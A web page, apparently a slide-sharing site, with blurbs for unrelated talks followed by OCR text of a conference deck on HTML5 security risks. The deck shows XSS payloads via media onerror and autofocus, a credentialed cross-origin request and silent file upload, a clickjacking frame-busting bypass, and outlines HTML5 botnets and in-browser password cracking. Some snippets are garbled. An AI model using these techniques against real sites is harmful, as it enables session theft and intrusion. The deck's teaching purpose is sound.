HTML5 introduces new security risks due to features like client-side storage, geolocation, web sockets, and cross-origin resource sharing. Attackers could exploit these to launch cross-site scripting attacks, SQL injection, poison application caches, perform clickjacking, and more. While HTML5 aims to improve security with features like sandboxing, current implementations remain vulnerable. As HTML5 adds functionality, more security issues are likely to emerge that require ongoing investigation and remediation.
Websockets on the JVM: Atmosphere to the rescue!jfarcand
WebSockets' State of the Union on the JVM with the help of the Atmosphere Framework. Status of atmosphere.js, socketio.js, socks.js client side library discussed as well.
Websockets on the JVM: Atmosphere to the rescue!jfarcand
WebSockets' State of the Union on the JVM with the help of the Atmosphere Framework. Status of atmosphere.js, socketio.js, socks.js client side library discussed as well.
Asynchronous Web Programming with HTML5 WebSockets and JavaJames Falkner
(Talk originally given @ KCDC - http://kcdc.info ).
Over the last decade, advances in web computing have removed many of the barriers to entry for developers. New languages, frameworks, and development methodologies have kickstarted new ideas and new ways to develop web applications to make modern life easier and more efficient. WebSockets (introduced as part of HTML5) is one such technology that enables a new class of scalable, super-responsive, collaborative, and real-time web applications with a wide range of uses.
In this talk, we will first cover the basics of asynchronous web programming using WebSockets, including predecessors such as polling and long-polling, applications of WebSockets, its limitations and potential bottlenecks, and potential future improvements.
Next, we will demo and dissect a real-world use case for realtime social data analytics, using the Apache Tomcat implementation of WebSockets and the Java-based Liferay Portal Server. This will include a discussion about development of WebSocket endpoints, its lifecycle within the application container and browser, debugging WebSockets, and scalability topics.
Ville Lautanala describes different transport channels that allow pushing data from servers to clients in real time.
He also introduces a case study of Flowdock's experience with socket.io and WebSockets.
Presentation from Frontend Finland meetup, March 14th. A slightly modified version was presented at SFJS, April 3rd.
Ruby Proxies for Scale, Performance, and Monitoring - GoGaRuCo - igvita.comIlya Grigorik
A high-performance proxy server is less than a hundred lines of Ruby code and it is an indispensable tool for anyone who knows how to use it. In this session we will first walk through the basics of event-driven architectures and high-performance network programming in Ruby using the EventMachine framework.
EWD 3 Training Course Part 38: Building a React.js application with QEWD, Part 2Rob Tweed
This is part 38 of the EWD 3 Training Course. This presentation begins to explore in detail how to develop a React.js application that integrates with QEWD
Often, web developers keep hearing about "Same Origin Policy (SOP)" of browsers but live with half-knowledge or with several confusions. This session attempts to clear the misconceptions of SOP.
Asynchronous Web Programming with HTML5 WebSockets and JavaJames Falkner
(Talk originally given @ KCDC - http://kcdc.info ).
Over the last decade, advances in web computing have removed many of the barriers to entry for developers. New languages, frameworks, and development methodologies have kickstarted new ideas and new ways to develop web applications to make modern life easier and more efficient. WebSockets (introduced as part of HTML5) is one such technology that enables a new class of scalable, super-responsive, collaborative, and real-time web applications with a wide range of uses.
In this talk, we will first cover the basics of asynchronous web programming using WebSockets, including predecessors such as polling and long-polling, applications of WebSockets, its limitations and potential bottlenecks, and potential future improvements.
Next, we will demo and dissect a real-world use case for realtime social data analytics, using the Apache Tomcat implementation of WebSockets and the Java-based Liferay Portal Server. This will include a discussion about development of WebSocket endpoints, its lifecycle within the application container and browser, debugging WebSockets, and scalability topics.
Ville Lautanala describes different transport channels that allow pushing data from servers to clients in real time.
He also introduces a case study of Flowdock's experience with socket.io and WebSockets.
Presentation from Frontend Finland meetup, March 14th. A slightly modified version was presented at SFJS, April 3rd.
Ruby Proxies for Scale, Performance, and Monitoring - GoGaRuCo - igvita.comIlya Grigorik
A high-performance proxy server is less than a hundred lines of Ruby code and it is an indispensable tool for anyone who knows how to use it. In this session we will first walk through the basics of event-driven architectures and high-performance network programming in Ruby using the EventMachine framework.
EWD 3 Training Course Part 38: Building a React.js application with QEWD, Part 2Rob Tweed
This is part 38 of the EWD 3 Training Course. This presentation begins to explore in detail how to develop a React.js application that integrates with QEWD
Often, web developers keep hearing about "Same Origin Policy (SOP)" of browsers but live with half-knowledge or with several confusions. This session attempts to clear the misconceptions of SOP.
This talk is a generic but comprehensive overview of security mechanism, controls and potential attacks in modern browsers. The talk focuses also on new technologies, such as HTML5 and related APIs to highlight new attack scenario against browsers.
Palestra ministrada no OWASP Floripa Day - Florianópolis - SC |
A palestra tem como objetivo mostrar os conceitos e funcionamento de algumas funcionalidades que foram adicionadas ao HTML5, levando em consideração os aspectos de segurança do client-side. Para as funcionalidades destacadas, foram criados cenários de ataques visando ilustrar a obtenção de informações sensíves armazenadas no browser ou até mesmo usar o browser da vítima para lançar ataques contra outros sistemas. Através da exploração das funcionalidades existentes no HTML5, técnicas de exploração como XSS e CSRF, tornam-se mais poderosas e eficientes, sendo possível em alguns casos contornar algumas restrições do Same Origin Policiy (SOP).
Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...Divyanshu
Browser exploitation| Reporting vulnerability in top browsers and finding CVE.
Session in Null Bangalore Meet 23 November 2019 Null/OWASP/G4H combined meetup
Thanks to respective researchers for their work.
JavaScript controls our lives – we use it to zoom in and out of a map, to automatically schedule doctor appointments and toplay online games. But have we ever properly considered thesecurity state of this scripting language? Before dismissing the (in)security posture of JavaScript on the grounds of a client-side problem, consider the impact ofJavaScript vulnerability exploitation to the enterprise: from stealing serverside data to infecting users with malware. Hackers are beginning to recognize this new playground and are quicklyadding JavaScript exploitation tools to their Web attack arsenal.
These are the slides from my "HTML5 Real-TIme and Connectivity" presentation at the San Francisco HTML5 User Group (http://sfhtml5.org). The presentation covers:
Web Origin
Cross Document Messaging (PostMessage)
CORS
XHR Level2
WebSocket
Server-Sent Events (EventSource)
SPDY
Top 10 HTML5 Features for Oracle Cloud DevelopersBrian Huff
Whether you are using Mobile, Social, Java, or Sites in the cloud, HTML5 is probably the easiest way to create and maintain web applications. Most of the Oracle cloud supports HTML5, so it is important to understand what powerful new features are built into this platform.
I'm take picture from here and there by goggling not mentioning all source please let me know if anyone has any objection. This presentation was presented in “securITy” Information Security Conference at BASIS SoftExpo 2012
Unlocking Productivity: Leveraging the Potential of Copilot in Microsoft 365, a presentation by Christoforos Vlachos, Senior Solutions Manager – Modern Workplace, Uni Systems
zkStudyClub - Reef: Fast Succinct Non-Interactive Zero-Knowledge Regex ProofsAlex Pruden
This paper presents Reef, a system for generating publicly verifiable succinct non-interactive zero-knowledge proofs that a committed document matches or does not match a regular expression. We describe applications such as proving the strength of passwords, the provenance of email despite redactions, the validity of oblivious DNS queries, and the existence of mutations in DNA. Reef supports the Perl Compatible Regular Expression syntax, including wildcards, alternation, ranges, capture groups, Kleene star, negations, and lookarounds. Reef introduces a new type of automata, Skipping Alternating Finite Automata (SAFA), that skips irrelevant parts of a document when producing proofs without undermining soundness, and instantiates SAFA with a lookup argument. Our experimental evaluation confirms that Reef can generate proofs for documents with 32M characters; the proofs are small and cheap to verify (under a second).
Paper: https://eprint.iacr.org/2023/1886
UiPath Test Automation using UiPath Test Suite series, part 5DianaGray10
Welcome to UiPath Test Automation using UiPath Test Suite series part 5. In this session, we will cover CI/CD with devops.
Topics covered:
CI/CD with in UiPath
End-to-end overview of CI/CD pipeline with Azure devops
Speaker:
Lyndsey Byblow, Test Suite Sales Engineer @ UiPath, Inc.
Pushing the limits of ePRTC: 100ns holdover for 100 daysAdtran
At WSTS 2024, Alon Stern explored the topic of parametric holdover and explained how recent research findings can be implemented in real-world PNT networks to achieve 100 nanoseconds of accuracy for up to 100 days.
DevOps and Testing slides at DASA ConnectKari Kakkonen
My and Rik Marselis slides at 30.5.2024 DASA Connect conference. We discuss about what is testing, then what is agile testing and finally what is Testing in DevOps. Finally we had lovely workshop with the participants trying to find out different ways to think about quality and testing in different parts of the DevOps infinity loop.
GridMate - End to end testing is a critical piece to ensure quality and avoid...ThomasParaiso2
End to end testing is a critical piece to ensure quality and avoid regressions. In this session, we share our journey building an E2E testing pipeline for GridMate components (LWC and Aura) using Cypress, JSForce, FakerJS…
Securing your Kubernetes cluster_ a step-by-step guide to success !KatiaHIMEUR1
Today, after several years of existence, an extremely active community and an ultra-dynamic ecosystem, Kubernetes has established itself as the de facto standard in container orchestration. Thanks to a wide range of managed services, it has never been so easy to set up a ready-to-use Kubernetes cluster.
However, this ease of use means that the subject of security in Kubernetes is often left for later, or even neglected. This exposes companies to significant risks.
In this talk, I'll show you step-by-step how to secure your Kubernetes cluster for greater peace of mind and reliability.
Maruthi Prithivirajan, Head of ASEAN & IN Solution Architecture, Neo4j
Get an inside look at the latest Neo4j innovations that enable relationship-driven intelligence at scale. Learn more about the newest cloud integrations and product enhancements that make Neo4j an essential choice for developers building apps with interconnected data and generative AI.
Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...SOFTTECHHUB
The choice of an operating system plays a pivotal role in shaping our computing experience. For decades, Microsoft's Windows has dominated the market, offering a familiar and widely adopted platform for personal and professional use. However, as technological advancements continue to push the boundaries of innovation, alternative operating systems have emerged, challenging the status quo and offering users a fresh perspective on computing.
One such alternative that has garnered significant attention and acclaim is Nitrux Linux 3.5.0, a sleek, powerful, and user-friendly Linux distribution that promises to redefine the way we interact with our devices. With its focus on performance, security, and customization, Nitrux Linux presents a compelling case for those seeking to break free from the constraints of proprietary software and embrace the freedom and flexibility of open-source computing.
How to Get CNIC Information System with Paksim Ga.pptxdanishmna97
Pakdata Cf is a groundbreaking system designed to streamline and facilitate access to CNIC information. This innovative platform leverages advanced technology to provide users with efficient and secure access to their CNIC details.
Observability Concepts EVERY Developer Should Know -- DeveloperWeek Europe.pdfPaige Cruz
Monitoring and observability aren’t traditionally found in software curriculums and many of us cobble this knowledge together from whatever vendor or ecosystem we were first introduced to and whatever is a part of your current company’s observability stack.
While the dev and ops silo continues to crumble….many organizations still relegate monitoring & observability as the purview of ops, infra and SRE teams. This is a mistake - achieving a highly observable system requires collaboration up and down the stack.
I, a former op, would like to extend an invitation to all application developers to join the observability party will share these foundational concepts to build on:
In the rapidly evolving landscape of technologies, XML continues to play a vital role in structuring, storing, and transporting data across diverse systems. The recent advancements in artificial intelligence (AI) present new methodologies for enhancing XML development workflows, introducing efficiency, automation, and intelligent capabilities. This presentation will outline the scope and perspective of utilizing AI in XML development. The potential benefits and the possible pitfalls will be highlighted, providing a balanced view of the subject.
We will explore the capabilities of AI in understanding XML markup languages and autonomously creating structured XML content. Additionally, we will examine the capacity of AI to enrich plain text with appropriate XML markup. Practical examples and methodological guidelines will be provided to elucidate how AI can be effectively prompted to interpret and generate accurate XML markup.
Further emphasis will be placed on the role of AI in developing XSLT, or schemas such as XSD and Schematron. We will address the techniques and strategies adopted to create prompts for generating code, explaining code, or refactoring the code, and the results achieved.
The discussion will extend to how AI can be used to transform XML content. In particular, the focus will be on the use of AI XPath extension functions in XSLT, Schematron, Schematron Quick Fixes, or for XML content refactoring.
The presentation aims to deliver a comprehensive overview of AI usage in XML development, providing attendees with the necessary knowledge to make informed decisions. Whether you’re at the early stages of adopting AI or considering integrating it in advanced XML development, this presentation will cover all levels of expertise.
By highlighting the potential advantages and challenges of integrating AI with XML development tools and languages, the presentation seeks to inspire thoughtful conversation around the future of XML development. We’ll not only delve into the technical aspects of AI-powered XML development but also discuss practical implications and possible future directions.
In his public lecture, Christian Timmerer provides insights into the fascinating history of video streaming, starting from its humble beginnings before YouTube to the groundbreaking technologies that now dominate platforms like Netflix and ORF ON. Timmerer also presents provocative contributions of his own that have significantly influenced the industry. He concludes by looking at future challenges and invites the audience to join in a discussion.
Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!SOFTTECHHUB
As the digital landscape continually evolves, operating systems play a critical role in shaping user experiences and productivity. The launch of Nitrux Linux 3.5.0 marks a significant milestone, offering a robust alternative to traditional systems such as Windows 11. This article delves into the essence of Nitrux Linux 3.5.0, exploring its unique features, advantages, and how it stands as a compelling choice for both casual users and tech enthusiasts.
4. HTML5
• New protocol of HTML
HTML5 + CSS3+ JavaScript
Compare to XML and XHTML
• Protocol design
WHATWG (Apple Mozilla Google Opera) in 2004
W3C
IETF
• Still in progress
http://www.html5test.com/
6. What’s in HTML5
• New Tag: <button> <canvas> <audio> <video>
• New Tag attribute: autocomplete ,autofocus ,regex
• New form controls for date ,time, email
• Geolocation(demo: http://html5demos.com/geo)
• Client-side storge localStorge sessionStorge and WebSQL
(demo:http://html5demos.com/database-rollback)
• WebSockets new way of communication
• WebWorkers allow multithread javascript in the background
7. What’s out in HTML5
• Present element <font><center>
• Present attribute<align><border><frame><frame set>
• Old special effects<marquee>,<bgsound>
Follow the rule :
Presentation and content are divided
9. Basic ideas about the new vulnerability
New security problem because of new method
brought into web application
the security issues in web application has not been
changed
New security has been found worth to investigate
10. Security concern 1 client
Attack surface : client-side
• client-side and offline storage
• allows greater amount of data to be stored
11. Security concern 2 web sql
• Bring SQL to the client-side
• Core methods:
– openDatabase(“Database”,”Database
version”,”Database Description”,”Estimated Size”)
– Transaction (“SQL statement”)
• The usual attack : XSS,SQL injection can be
used here.
12. Security concern 3 Application cache
• Useful for offline browsing speed and reduce
server load
• The size limit for cached data for site :5MB
• Example 1 enabling application cache:
<html manfest=“example.manifest”>
…..
</html>
• Example 2 update applicaton cache:
applicationCache.addEventListener(‘checking’,updateCacheStatus,false);
• Poisoning the Application cache
• Any website can create a cache in the client
• Any file can be cached even in the /root directory
13. Security concern 4 html5 sandbox
• Sandbox is used to protect website from 3-
party software
<iframe src="untrusted.html" sandbox></iframe>
• can be used to clickjacking attack
<iframe sandbox=“allow-same-origin allow-form allow-scripts”>
14. Security concern 5 CROS
• Cros (Cross Origin Resource Sharing )
• Allow cross domain AJAX
var xhr = new XMLHttpRequset()
xhr.open(“post”,http://victim, ture )
xhr.setRequsetHeader(“Content-Type ”,”text/plain”);
xhr.withCredentials = “ture”;//send cookies
Xhr.send(Anything I want )
• Silent file upload
Fuction fileUpload(url,filedata,fileName){
Var fileSize = fileData.length,
Boundary =‘xxxxxxxxxxxx’
xhr = new XMLHttpRequest();
xhr.open(“POST”,url,true);
Xhr.withCredentials(“Content-Type”,”multipart/form-data”,boundary=“+boundary)
Xhr.setRequestHeader(“cotent-Length”,fileSize);}
17. Security concern 5 clickjacking
Most Alexa top 500 website use frame busting
to protect from clickjackng
If (top!=self)
If (top.location != self.location)
Can be easy bypassed by in HTML5
<iframe sandbox src="//victim"></iframe>
18. Security concern 5 XSS
New Tag and new Attribute cause XSS
<video onerror=“javascript:alert(1)”><source>
<audio onerror=“javascript:alert(1)”><source>
Before HTML5:
<input type=ʺtextʺ value=ʺ‐‐>Injecting hereʺ onmouseover=ʺalert(ʹInjected valueʹ)ʺ>
With HTML5:
<input type=ʺtextʺ value=ʺ‐‐>Injecting hereʺ onfocus=ʺalert(ʹInjected valueʹ)ʺ
autofocus>
19. Security concern 5 Drag and Drop API
<div draggable=ʺtrueʺ
ondragstart=ʺevent.dataTransfer.setData(ʹtext/plainʹ, ʹEvil dataʹ)ʺ>
<h3>DRAG ME!!</h3>
</div>
20. Security concern 6 html5 shell
GET http://www.google.com Send request to
the web server
Pentester’s browser
Proxy
Send Google home page to
Pentester’s browser Send the
response body to
he proxy
Web server
Send the response body
to the shell of the
web server
Google web server Send the request
responds with the to the victim’s
HTML fot its homepage browser
Victim’s browser
www.google.com
Request the google web
server for
http://www.google.c
21. Security concern 7 network reconnaissance
Cross domain XMLHttpRequests and WebSockets
Port Status WebSocket COR
Open (application type <100ms <100ms
1&2)
Closed ~1000ms ~1000ms
Filtered >30000ms >30000ms
22. Security concern 8 HTML5 Botnets
Webworkers is a threading model for javascript
Background JavaScript threads that were started using
Botnet creation:
WebWorkers can send cross domain XMLHttpRequests even
though the remote website does not support it.
• Reaching out testvictimsthat around
A to showed
• Extending execution lifetimehas 600 zombies can send around
If you a small botnet just
Html5 botnets based attack
• Application –level DDos attacks
• Email Spam
• Distributed password cracking
23. Distributed password cracking
easy to launch a password cracker under HTML5
http://www.andlabs.org/tools/ravan.html that one browser possible
Test show
can observe password guessing rates
Submit hash of 100,000 MD5/second in JavaScript
Ravan
Ravan Mater 100-115 times slower than that native
Web
Manage Cracking Backend
code (like LC5),but if you control 100
zombies.it has the same cracking rate.
rk
Wo
lt
t
su
Ge
Re
it
bm
Su
Work farm
24. Top10 Risks in html5
1. ClickJacking & Phishing by mixing layers and iframe
2. CSRF and leveraging CORS to bypasses SOP
3. Attacking WebSQL and client side SQL injection
4. Stealing information from Storage and Global variables
5. HTML5 tag abuse and XSS
6. HTML5 and DOM based XSS and redirects
7. DOM injections and Hijacking with HTML 5
8. Abusing thick client features
9. Using WebSockets for stealth attacks
10. Abusing WebWorker functionality
25. Conclusion
• HTML5 &DOM-level3 &XHR-level2 via javascript are
involved in creating the next generation application
• As the people heavily use web browser .More
features will bring into HTML5
• More enhanced features in HTML5 will bring threat
and challenges
• More security issues will be discovered in the future
26. Reference
[1]HTML5 Security CheatSheet ‐ http://code.google.com/p/html5security/
[2]Shell of the Future ‐ http://www.andlabs.org/tools.html#sotf
[3] Next Generation Clickjacking ‐
http://www.contextis.co.uk/resources/white‐papers/clickjacking/Context‐Clic
kjacking_white_paper.pdf
[4]OWASP ClickJacking Guide ‐ http://www.owasp.org/index.php/Clickjacking
[5]http://html5sec.org/
[6]Hacking Facebook with HTML5 ‐ http://m‐austin.com/blog/?p=19
[7]http://html5demos.com
[8] https://www.owasp.org/index.php/Clickjacking
[9] http://www.andlabs.org/